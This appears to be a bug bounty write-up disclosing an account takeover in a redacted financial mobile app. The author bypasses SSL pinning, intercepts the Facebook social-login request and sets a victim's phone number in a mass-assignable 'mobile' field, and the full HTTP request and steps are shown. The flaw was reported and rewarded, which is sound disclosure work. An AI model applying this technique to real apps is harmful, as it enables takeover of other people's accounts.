Story of Account Takeover : Using Social Login with Mass Assignment Vulnerability to hack accounts !

Hey everyone, this is Mohammad Kaif aka mkahmad an 18 year old Security Researcher & Bug Hunter from Varanasi, India.

This is my first writeup about the Account Takeover which I found on a private program.

So let’s start 😉

Let’s say the program name as REDACTED. This program had mobile app in scope so I directly downloaded the app from Play Store and started testing it.

The target app had social login such as Login with Facebook and Login with Google. So I started checking this functionality.

The app had SSL Pinning so I bypassed it with frida script and fired up my Burp Suite.

The target app was a financial app in which users can either signup through email, phone number as well as social login channels i.e. Facebook and Google.

The signup with Facebook functionality had an Mass Assignment vulnerability in which an attacker can completely takeover victim’s account just by knowing the phone number of victim.

Mass assignment vulnerabilities occur when a user is able to initialize or overwrite server-side variables for which are not intended by the application. By manually crafting a request to include additional parameters in a request, a malicious user may adversely affect application functionality.

  1. Click on login with Facebook button in the app.
  2. Intercept the request using Burp Suite.
  3. After authorizing the App on Facebook a HTTP Request was initiated by the app.

POST /signup/users/socialLogin HTTP/1.1
Content-Type: application/json; charset=UTF-8
Content-Length: 834
Host: api.redacted.com
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/4.2.1

{“profile_picture”:”http://graph.facebook.com/3061xxxxxxxxx/picture?type=large","emailId":"example@gmail.com","socialType":"FB","fname":"test","pincode":"","dob":"","mobile":"","city":"","gender":"","androidId":"3c91804d96d13669","deviceToken":"xxxx","appVersion":"1.0.0|10","country":"","socialId":"306199919","addressl2":"","lname":"Test"}

There is a mobile parameter in the above HTTP Request which was vulnerable to Mass Assignment.

4. Enter the Victim’s account phone number in the mobile parameter’s value and forward the request.

5. Now the victim’s account is attached with Attacker’s Email 😎

6. What makes it a more severe attack?? Users can’t update or delete their email account !!

7. Reported and Rewarded by the company ;)

Response from the company:

We are very grateful for your submission. Thank you for your excellent work.

Connect with me on my LinkedIn and Twitter

LinkedIn: https://www.linkedin.com/in/mohammad-kaif-security/

Twitter: https://twitter.com/_mkahmad

Thank you for reading my writeup. I will publish more writeups in the future ;)

Hope you guys learned something from this article.

I am a Security Researcher and Bug Hunter. Passionate about Web & Mobile Security Vulnerabilities